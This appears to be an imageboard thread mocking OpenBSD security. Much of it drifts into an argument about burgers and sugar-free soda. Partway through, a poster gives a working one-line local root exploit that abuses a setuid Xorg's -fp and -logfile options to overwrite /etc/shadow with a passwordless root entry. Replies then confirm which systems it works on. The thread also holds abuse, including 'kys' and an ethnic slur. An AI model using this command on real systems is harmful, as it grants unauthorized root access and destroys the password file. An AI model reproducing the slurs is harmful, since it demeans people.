>muh memeBSS security
>simple Xorg exploit works
lmao kys with your meme driverless trash OS
Muh memeBSS security
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>His OS handles fonts and scroll bars in the kernel
No thanks, pajeet
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keep fighting
You need to have local access, at this point you're fucked anyway.
>local access
for a system that raves about its security it’s laughable. what if you want to give a shell account to a friend, is it expected behavior to get rooted in less than a minute? at this point I could say my offline win95 is safer than all your unix garbage
what are you talking about? sauce?
Good job you got a drink with no sugar in, that would have been unhealthy otherwise!
pls, if you give me local access to any windos machine i will be rooted in less than 5 minutes
I don't like to fill up on sugar with soda pops, also no fries, fish, chicken and hamburgers, I think it's a decent meal.
>Buy 4 burgers
>Damn now I better think of my health
I want the sugar free meme to stop
>I think it's a decent meal.
like I said no point in drinking all that extra fructose or whatever sugar they put in when the sugar free alternative tastes just as good. I eat healthy most of the time and having some junk food is not an issue.
>when the sugar free alternative tastes just as good
It tastes completely different in every way. Do your taste buds not work or something?
Also there's a difference between having "some" junk food and eating 4 burgers then claiming it counts as a decent meal.
>completely different
I don't think so, it might even taste better in some way. I think it's a decent meal if it's not your daily menu.
>pays real money for a filet-o-shit sandwich
>thinks his opinion matters
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cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
This shouldn't work if Xorg is not setuid root, right? And it's not on my Debian machine.
yes it's not on some linux distros but is on OpenBSD lmao
Confirmed, it doesn't work on debian, Xorg is not setuid root, can't move the old shadow file to shadow.old and fails there.
Sugar tastes good because we're biologically programmed to want it, it's pure energy in a very easily digestible form, to think that something like sucralose tastes better is to entirely ignore basic biology, you cannot digest sucralose or other garbage chemical sugars so why would you eat/drink it?
>OpenBSD configures Xorg as setuid root
The absolute madman.
Apparently it's only relatively recently fixed.
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